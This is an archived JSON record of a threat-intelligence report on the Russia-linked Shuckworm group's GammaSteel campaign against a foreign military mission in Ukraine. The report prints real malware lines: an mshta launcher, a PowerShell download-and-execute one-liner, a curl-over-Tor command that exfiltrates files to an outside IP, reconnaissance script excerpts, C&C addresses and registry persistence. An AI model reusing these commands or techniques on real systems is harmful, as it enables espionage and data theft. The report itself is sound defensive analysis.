{
	"id": "2b540133-7097-49c5-a0cc-0da4540d21df",
	"created_at": "2026-04-06T00:17:45.922111Z",
	"updated_at": "2026-04-10T03:37:04.344649Z",
	"deleted_at": null,
	"sha1_hash": "197ba2d6753fe6ffefa2196f365fe0127a25a020",
	"title": "Shuckworm Targets Foreign Military Mission Based in Ukraine",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 104864,
	"plain_text": "Shuckworm Targets Foreign Military Mission Based in Ukraine\r\nArchived: 2026-04-05 14:24:28 UTC\r\nShuckworm’s relentless focus on Ukraine has continued into 2025, with the group targeting the military mission of a\r\nWestern country based in the Eastern European nation.\r\nThe first activity in this campaign occurred in February 2025, and it continued into March. The initial infection vector used\r\nby the attackers appears to have been an infected removable drive.\r\nIn this campaign, the attackers appear to be using an updated version of their GammaSteel tool. GammaSteel is an\r\ninfostealer that exfiltrates data from victim networks. The attackers are seen using various methods for data exfiltration,\r\nincluding using the write.as web service for possible exfiltration. They are also seen using cURL alongside Tor as a backup\r\nmethod of data exfiltration. cURL is an open-source command-line tool that can be used to transfer data to and from a server\r\nand is frequently leveraged by malicious actors.\r\nThis campaign also seems to demonstrate a move by Shuckworm from using a lot of VBS scripts to using more PowerShell-based tools, particularly later in its attack chain. It is likely leveraging PowerShell for obfuscation and also because it allows\r\nit to store scripts in the registry. GammaSteel was deployed following a complex, multi-staged attack chain, with frequent\r\nuse of obfuscation. The process was most likely designed to minimize the risk of detection. \r\nShuckworm (aka Gamaredon, Armageddon) is a Russia-linked espionage group that has almost exclusively focused its\r\noperations on government, law enforcement, and defense organizations in Ukraine since it first appeared in 2013. 
It is\r\nbelieved that Shuckworm operates on behalf of the Russian Federal Security Service (FSB).\r\nActivity Timeline\r\nThe initial infection in this campaign appeared to occur on February 26 with the creation of a Windows Registry value under\r\nthe UserAssist key that indicates the infection may have started from an external drive and an LNK file named D:\\files.lnk. \r\nThe UserAssist registry key records the applications, files, links, and other objects accessed by the user through Windows\r\nExplorer, with the entry names stored in ROT13.\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\\Count\\Q:\\svyrf.yax\r\nAfter that event, explorer.exe launched an mshta.exe process executing the following command:\r\n\"C:\\Windows\\System32\\mshta.exe\" javascript:eval('w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"explorer\r\nfiles\");w.run(\"wscript.exe //e:vbScript \\~.drv\");window.close()')\r\nThen, the following commands were executed:\r\n\"C:\\Windows\\System32\\wscript.exe\" //e:vbScript ~.drv\r\n\"C:\\Windows\\System32\\wscript.exe\" \"\"C:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms\"\"\r\n//e:vbscript //b /numerousIOC\r\n\"C:\\Windows\\System32\\wscript.exe\" \"\"C:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms\"\"\r\n//e:vbscript //b /numerousIOC\r\n\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\keepoAI.hta\"\r\nThe ~.drv file is highly obfuscated, but it seems to be used to create two files and execute them:\r\nC:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms\r\nc:\\users\\public\\ntuser.dat.tmcontainer00000000000000000002.regtrans-ms\r\nThe first file (NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms) is used to contact the command and\r\ncontrol (C\u0026C) server and stay in constant contact with it. 
First, it searches for a ping record with a WMI query:\r\n  \"Select * From Win32_PingStatus where Address = 'mil.gov.ua'\" to the address \"mil.gov.ua\".\r\nIf there is no ping record or the ping is not successful, it will finish execution.\r\nIt then checks if the C\u0026C server address is stored in the value:\r\nHKEY_CURRENT_USER\\\\Console\\\\WindowsUpdates\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 1 of 6\n\nIf not, it will run different methods to obtain the final C\u0026C server address.\r\nThe script leverages different legitimate services to try to resolve the C\u0026C server, including:\r\nhxxps://teletype[.]in/[Value_read_from_WindowsDetect_key]\r\nhxxps://telegra[.]ph/Mark-01-20-5\r\nhxxps://t[.]me/s/futar23\r\n[2_digit_number]sleep.crudoes[.]ru\r\nhxxps://check-host[.]net/ip-info?host=[2_digit_number]position.crudoes.ru\r\nposition.crudoes[.]ru\r\nIn this instance, the attackers were able to obtain a C\u0026C server address and contact it:\r\n107.189.19.218\r\nFrom hxxps://telegra[.]ph/Mark-01-20-5 we also found the following C\u0026C server:\r\nhxxps://des-cinema-democrat-san.trycloudflare[.]com/server\r\nThe C\u0026C server is similar to others that have been used by Shuckworm in the past, as shown in an investigation by\r\nRecorded Future where the group leveraged Cloudflare tunnels for their C\u0026C infrastructure.\r\nFrom t[.]me/futar123 we also found the C\u0026C 107.189.19[.]137 from recovered text:\r\n==107@189@19@137==\r\nThe second file mentioned previously (NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms) appears to be\r\ndesigned to modify the following registry keys to not show hidden and system 
files:\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt\r\nIt then starts to infect any removable drives and network drives by creating shortcut files (.lnk) for every folder to execute\r\nthe first malicious mshta.exe command (wscript.exe //e:vbScript ~.drv) and hide the folder.\r\nWe found an array of possible file names in Ukrainian, but it is unknown from the script what these files may do.\r\nOriginal:\r\n(\"План проведення\", \"Спецповідомлення\", \"лиcт дo\", \"СПЕЦПЕРЕВІРКА\", \"Рапорт поранення\", \"вiдряджeння\",\r\n\"БОЙОВЕ РОЗПОРЯДЖЕННЯ ППО\", \"Рішення командира на оборону\", \"Зобовязання\", \"бойовий розрахунок\",\r\n\"Супровід ГУР\", \"Інформація щодо загиблих\", \"БМП\", \"продовження контракту\", \"Довідка про зустріч з джерелом\")\r\nTranslated:\r\n(\"Conduct plan\", \"Special message\", \"letter to\", \"SPECIAL INSPECTION\", \"Wound report\", \"deployment\", \"AIR\r\nDEFENSE COMBAT ORDER\", \"Commander's decision on defense\", \"Obligation\", \"Combat calculation\", \"GUR support\",\r\n\"Information on the dead\", \"BMP\", \"contract extension\", \"Reference about meeting with the source\")\r\nOn March 1, an array of activity occurred on the targeted network.\r\nOn one machine, the malicious VBscript—C:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms—is executed via WScript.exe. 
It then reaches out to the following C\u0026C URL:\r\nhxxp://172.104.187.254/mood/1/3/2025/confer[.]html?=[REMOVED]\r\nThe malicious script also exfiltrates some data from the infected machine, such as the username, hostname, and the disk\r\nserial number via the User-Agent HTTP request header:\r\nIServerXMLHTTPRequest2.setRequestHeader(\"user-agent\", \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36\r\n([USERNAME]::[HOSTNAME]_[DISK_SERIAL_NUMBER]::/.nJudged/.TML,\");\r\nIt then saves the valid C\u0026C server address under the registry value: \r\n\"HKEY_CURRENT_USER\\Console\\WindowsUpdates\":\r\nIWshShell3.RegWrite(\"HKEY_CURRENT_USER\\Console\\WindowsUpdates\",\r\n\"http://172.104.187.254/mood/1/3/2025/confer.html?=[REMOVED]\", \"REG_SZ\");\r\nThe code received from the server is Base64 encoded and obfuscated and it launches the following PowerShell command:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" sleep\r\n15;$url='http://64.23.190.235/getinfo.php';$discord = (New-Object system.Net.WebClient).downloadString($url);\r\n$discord | iex\r\nThe C\u0026C server also downloads an obfuscated new version of the same script but this time with hardcoded C\u0026C addresses:\r\nhxxps://surfing-programmer-morris-mortality.trycloudflare[.]com\r\nhxxps://areas-apps-civic-loving.trycloudflare[.]com\r\nhxxps://nav-ni-furnished-handy.trycloudflare[.]com\r\nThis new malicious VBScript file is stored in the following path: \r\nc:\\users\\[REDACTED]\\ntuser.dat.ini\r\nAfter a connection to the new C\u0026C server (hxxps://nav-ni-furnished-handy.trycloudflare[.]com), two new PowerShell\r\nscripts are received. 
\r\nThe first script appears to be a reconnaissance tool, which is used to create a screenshot of the machine, run a systeminfo\r\ncommand, get the name of the security software running on the machine, get the available space from all disks, get the\r\nVolumeSerialNumber, the directory tree of the Desktop folder, a list of files in the Desktop folder, and a list of the running\r\nprocesses. It then sends all the collected information to the C\u0026C server hxxp://64.23.190[.]235/getinfo[.]php.\r\nThe following is an excerpt of the PowerShell script:\r\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.Windows.Forms\")\r\n$ScreenBounds = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize;\r\n$arw = \"Wi\",\"dt\",\"h\";\r\n$arh = \"H\",\"ei\",\"g\",\"ht\";\r\n$wi = $arw -join \"\"\r\n$he = $arh -join \"\" ;\r\n$w = $ScreenBounds.\"$wi\" + 1 - 1;\r\n$h = $ScreenBounds.\"$he\" + 1 - 1;\r\n$Image = New-Object System.Drawing.Bitmap($w , $h);\r\n$CopyScreen = [System.Drawing.Graphics]::FromImage($Image);\r\n$process = $(ps | foreach-Object{$a = $_.ProcessName; $a+\"`n\"} );\r\n$Point = New-Object System.Drawing.Point(1, 1);\r\n$ip =\"64.23.190.235\";\r\n$nk = \"com\";\r\n$op = \"o.p\";\r\n$nf = \"nf\";\r\n$nk = $nk + \"putern\" + \"ame\";\r\n$comp = (Get-Item -Path env:\\$nk).Value;\r\n$dasda =\"Vo\"\r\n$dasda = $dasda +\"lume\"\r\n$dasda =$dasda +\"Seria\"\r\n$dasda =$dasda +\"lNum\"\r\n$dasda =$dasda +\"ber\"\r\n$Path = \"$env:appdata\\\";\r\n$name = $path + \"$(get-date -f yyyy.MM.dd_h\\h_m\\m)\"+\".jpg\";\r\nif(![System.IO.Directory]::Exists($Path)){ New-Item -ItemType Directory $Path }\r\n$Point = [Drawing.Point]::Empty\r\n$NameValueCollection = New-Object System.Collections.Specialized.NameValueCollection;\r\n$httptext =\"http://\";\r\n$infotext = \"/i\"+$nf+ $op;\r\nThe second PowerShell script received from the C\u0026C server stores the payload 
obfuscated and split by functions in different\r\nvalues in the registry.\r\nSet-ItemProperty -Path 'HKCU:\\Software' -Name 'LGJuKKhrjgwffjmc1jzSkzT' -Value\r\n'DQAKACAAIAAgACAAdAByAHkAewB7AA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAFQAZQB4AHQA\r\nSet-ItemProperty -Path 'HKCU:\\Software' -Name 'wOVzQC0zskdwz2xbraoXftD' -Value\r\n'DQAKACAAIAAgACAAdAByAHkAewB7AA0ACgAJAAkAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0A\r\nThe following is an example of one of the PowerShell functions stored in the registry:\r\n     try{\r\n $jfecWp1fljll0j004nzEODg = \"www.phlovel.ru\";\r\n $odPSSiffq0huyxichtGXAWo =\r\n[System.Net.Dns]::gethostentry($jfecWp1fljll0j004nzEODg).addresslist[0];\r\n $YywyAi53bcklkjtplAEvUrl = $odPSSiffq0huyxichtGXAWo.tostring();\r\n return $YywyAi53bcklkjtplAEvUrl;\r\n }\r\n catch{\r\n return \"\";\r\n }\r\nThis stage appears to be the attackers’ final payload—a PowerShell version of Shuckworm’s known GammaSteel tool.\r\nThis tool enumerates all the files in the following folders:\r\nDesktop\r\nDocuments\r\nDownloads\r\nIt exfiltrates files that match a hardcoded extension list:\r\n\"*.doc\", \"*.docx\", \"*.xls\", \"*.xlsx\", \"*.ppt\", \"*.pptx\", \"*.vsd\", \"*.vsdx\", \"*.rtf\", \"*.odt\", \"*.txt\", \"*.pdf\"\r\nIt ignores folders that contain the following strings:\r\n\"prog\", \"windows\", \"appdata\", \"local\", \"roaming\", \"software\", \"public\", \"all users\"\r\nIt uses certutil.exe to get the MD5 of the exfiltrated file and possibly store it as a file, which is something previous versions\r\nof the GammaSteel malware also did.\r\n\"C:\\Windows\\system32\\certutil.exe\" -hashfile \"[REDACTED].txt\" MD5\r\nThis version of GammaSteel tries to exfiltrate the files via a PowerShell web request, but if it fails, as a fallback method, it\r\nuses cURL with a Tor network proxy to obfuscate the origin IP:\r\n\"C:\\Windows\\system32\\curl.exe\" -x 
socks5://127.0.0.1:9050 -v -k -F o2PVasTpH2AxGgiYBSjb=[REDACTED] -F\r\nAWpCbqMhrFvHx4QJkAXlj=@[REDACTED].pdf https://85.92.111.12\r\nThe first post parameter contains some information regarding the machine, like the hostname, the drive serial number, and\r\nthe path of the exfiltrated file:\r\njhEOKsGyR07pNfM::1000::PAikOnBfhsr::[REDACTED].pdf::Bqf4wlnsrc::22.02.2025\r\n14:18:24::mU0p1uNxlLvd::508383::GHCcfPBq1NwgZ::boML6spmjPF::Ti5vCm4hcu::[REDACTED]**2863E630::S3apqcC4J20QH\r\nIt also contained some incomplete code that seems to leverage the web service write.as to possibly exfiltrate some\r\ninformation from the computer:\r\n$REGWeqlhlmtvuskihNeRgib = \"https://write.as/api/posts\";\r\n$XUqKFBjm5dwgqh5aljmHuTC = '{{\"body\": \"This is a post.\", \"title\": \"My First Post\"}}';\r\n$aFKGHf31o2g4jrm00nkAQdv = @{{\"Content-Type\" = \"application/json\"}};\r\n$KMTPQV1jeau2lslqmzcNPyG = Invoke-WebRequest -Uri $REGWeqlhlmtvuskihNeRgib -Method \"POST\" -Body\r\n$XUqKFBjm5dwgqh5aljmHuTC -Headers $aFKGHf31o2g4jrm00nkAQdv;\r\nTo obtain persistence, the malware registers itself in the Run registry key:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[USERNAME]\r\nConclusion\r\nThis attack does mark something of an increase in sophistication for Shuckworm, which appears to be less skilled than other\r\nRussian actors, though it compensates for this with its relentless focus on targets in Ukraine. While the group does not\r\nappear to have access to the same skill set as some other Russian groups, Shuckworm does now appear to be trying to\r\ncompensate for this by continually making minor modifications to the code it uses, adding obfuscation, and leveraging\r\nlegitimate web services, all to try to lower the risk of detection.  
\r\nThis campaign also demonstrates that the group remains laser-focused on targeting entities within Ukraine for espionage\r\npurposes.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nSource: https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel"
	],
	"report_names": [
		"shuckworm-ukraine-gammasteel"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434665,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/197ba2d6753fe6ffefa2196f365fe0127a25a020.pdf",
		"text": "https://archive.orkl.eu/197ba2d6753fe6ffefa2196f365fe0127a25a020.txt",
		"img": "https://archive.orkl.eu/197ba2d6753fe6ffefa2196f365fe0127a25a020.jpg"
	}
}